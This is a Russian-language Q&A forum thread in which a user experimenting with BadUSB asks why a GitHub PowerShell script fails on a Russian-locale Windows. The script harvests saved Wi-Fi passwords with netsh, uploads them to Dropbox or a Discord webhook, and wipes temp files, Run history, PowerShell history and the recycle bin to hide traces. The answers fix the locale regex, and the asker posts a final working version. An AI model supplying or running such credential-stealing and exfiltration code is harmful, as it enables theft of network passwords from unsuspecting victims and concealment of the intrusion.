Не могу получить пароли от wifi с помощью powershell
экспериментирую с BadUsb, нашел на гитхабе скрипт:
$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-String
$wifiProfiles > $env:TEMP/--wifi-pass.txt
############################################################################################################################################################
# Upload output file to Dropbox
function DropBox-Upload {
[CmdletBinding()]
param (
[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
[Alias("f")]
[string]$SourceFilePath
)
$outputFile = Split-Path $SourceFilePath -leaf
$TargetFilePath="/$outputFile"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $db
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
}
if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TEMP/--wifi-pass.txt}
############################################################################################################################################################
function Upload-Discord {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = "$dc"
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:TEMP/--wifi-pass.txt"}
############################################################################################################################################################
function Clean-Exfil {
# empty temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue
# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
############################################################################################################################################################
if (-not ([string]::IsNullOrEmpty($ce))){Clean-Exfil}
RI $env:TEMP/--wifi-pass.txt
Но у меня он не заработал, накопал, что это может быть из-за языка который стоит на винде, поменял "Key Content\W+\:(.+)$"
на "Содержимое ключа\W+\:(.+)$"
, не помогло, в чем может быть проблема, как исправить? Заранее спасибо.
Ответы (2 шт):
Подозреваю, что проблема в том, что выполняется всё не в привилегированном режиме, хотя мне не нравится и первая строчка, потому немного подправил её
switch ([CultureInfo]::InstalledUICulture.Name){
ru-RU {$pattern = "Содержимое ключа\W+\:(.+)$"}
en-us {$pattern = "Key Content\W+\:(.+)$"}
}
$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{
$name = $_.Matches.Groups[1].Value.Trim()
(netsh wlan show profile $name key=clear) | Select-String $Pattern |%{
$pass=$_.Matches.Groups[1].Value.Trim()}
[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass}
} | Format-Table -AutoSize | Out-String
В итоге я решил оставить идею с Select-String "Key Content\W+\:(.+)$"
, я просто убрал эту часть кода, и теперь получаю .txt
со всеми параметрами сетей, а не только Имя сети-пароль
.
В том числе в таком .txt
есть и Содержимое ключа: сам пароль
, просто эту строчку надо найти вручную.
Вот итоговый скрипт:
############################################################################################################################################################
$wifiProfiles = (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Out-String
$dc = "Ваш Discord Webhook"
$wifiProfiles > $env:TEMP/--wifi-pass.txt
############################################################################################################################################################
function Upload-Discord {
[CmdletBinding()]
param (
[parameter(Position=0,Mandatory=$False)]
[string]$file,
[parameter(Position=1,Mandatory=$False)]
[string]$text
)
$hookurl = "$dc"
$Body = @{
'username' = $env:username
'content' = $text
}
if (-not ([string]::IsNullOrEmpty($text))){
Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
}
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file "$env:TEMP/--wifi-pass.txt"}
############################################################################################################################################################
function Clean-Exfil {
# empty temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath -ErrorAction SilentlyContinue
# Empty recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
}
############################################################################################################################################################
if (-not ([string]::IsNullOrEmpty($ce))){Clean-Exfil}
RI $env:TEMP/--wifi-pass.txt